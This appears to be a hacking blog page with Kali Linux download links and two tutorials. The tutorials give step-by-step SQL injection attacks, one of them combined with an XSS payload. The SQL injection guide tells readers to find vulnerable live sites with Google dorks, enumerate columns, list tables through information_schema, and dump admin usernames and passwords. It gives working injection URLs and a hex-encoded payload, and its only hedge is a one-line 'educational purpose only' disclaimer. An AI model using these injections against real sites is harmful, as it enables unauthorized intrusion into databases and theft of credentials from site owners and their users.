Kali Linux - 64-bit

Kali Linux is an advanced pentesting tool ... It is used for professional hacking and security. If you have any problem, plz ask in the comments

 ---------------------------------------------------------------

 ^_^ .:: DOWNLOAD HERE ::.

Read More

Kali Linux - Advanced Pentesting Tool (32-bit)

Kali Linux is an advanced pentesting tool ... It is used for professional hacking and security.

If you have any problem, plz ask in the comments ^_^

.:: DOWNLOAD HERE ::. 

Read More

XSSQLi Attack On A Website!

Hey Guys!

Today I am going to tell you that how to attack a website using XSS (Cross-Site-Scripting + SQLi).

This is pretty simple! We just have to inject our JavaScript code in the website. I will not teach you the basics of SQLi, you can find them on my this tutorial.

Step 1: First we have to find a SQLi vul. Site.
Like this:
http://www.site.in/index.php?id=3

Step 2: Finding the number of columns on the site using ORDER BY method.
So our site have 6 columns!

Step 3: Finding the vulnerable column, using UNION SELECT method.
An the most vulnerable column is 3!

Step 4: Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex. 

Our XSS payload:

<img src=x onerror=confirm(/XSS/)>

Hex encoded payload:

0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
 
Step 5: Injecting the payload into our site ;)
 
http://site.com/index.php?id=-3' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5--+
 
Good Bye, Video for this tutorial is coming soon on my Channel (Ahsan Tahir)

 
 
 
 

  

  

Read More

Union-Based SQL Injection

.:: UNION-BASED SQL INJECTION ::.

Hey guys!

Today I am going to teach you SQL Injection (Union-Based). I'll not teach you SQLi from automated SQLi tools! Just because pro hackers use manual. Tools are for kiddies ^_^ ...

So lets start! 

Step 1: First of all you need to find a SQLi vul. site. You can use Google Dorks (inurl:index.php?id= .. inurl:page.php?id= etc.) To check that if the site is vul. or not, you have to put a ' on the end of the URL.

If the page shows a SQL error that the site is vul. 

Step 2: Next, we have to find the number of columns! We will use the ORDER BY method!

Like this :

http://www.site.com/index.php?id=12-- order by 1 (no error)

http://www.site.com/index.php?id=12-- order by 2 (no error)

http://www.site.com/index.php?id=12-- order by 3 (no error)

http://www.site.com/index.php?id=12-- order by 4 (error)

Means that the site have 3 columns!

Step 3: Now we have to find the most vul. column. For this, I'll use the UNION ALL SELECT method!

Like this:
 http://www.site.com/index.php?id=-12 union all select 1,2,3,4--

it will show some numbers ... the most bold one is the most vulnerable!

Step 4: Now we have to extract some information ^_^

Remove the most vulnerable column and enter your command there like this ...

http://www.site.com/index.php?id=-12 union all select 1,@@version,3,4--

Here Is Some Cmd For Fetch Data On Website:-

Variable/Function        Output
@@hostname    :            Current Hostname
@@tmpdir    :            Tept Directory
@@datadir    :            Data Directory
@@version    :            Version of DB
@@basedir    :            Base Directory
user()        :            Current User
database()    :            Current Database
version()    :            Version
schema()    :            current Database
UUID()        :            System UUID key
current_user()    :        Current User
current_user    :        Current User
system_user()    :        Current Sustem user
session_user()    :        Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl    :    Check if it have ssl or not

Step 5: Next, we have to extract tables ...

Like this :-
http://www.site.com/index.php?id=-12 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()–

Now These are all table of the database…

Step 6: Now we have to extract columns ...

Now replace the “group_concat(table_name) with the “group_concat(column_name)”
Replace the “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–
Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .
Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.
click ok Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
 Copy and paste the code at the end of the url instead of the “mysqlchar”
For eg:
http://www.site.com/index.php?id=-2 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.
Now replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”
For eg:

http://www.site.com/index.php?id=-2
and 1=2 union select 1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7 from admin--

Now it will Username and passwords.
Enjoy..!!cheers..!!

Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.

^_^ Good Bye! ^_^

 

Read More